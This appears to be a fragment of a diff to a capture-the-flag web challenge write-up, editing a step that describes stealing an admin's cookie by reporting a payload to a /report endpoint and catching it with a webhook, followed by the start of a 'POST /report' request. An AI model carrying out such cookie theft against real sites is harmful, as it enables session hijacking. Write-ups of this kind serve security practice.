Web

 Solve Script

-Now steal the cookie from admin by reporting the payload to /report
+Now steal the cookie from admin by reporting the payload to /report endpoint by using webhook.

 1 | POST /report HTTP/1.1 |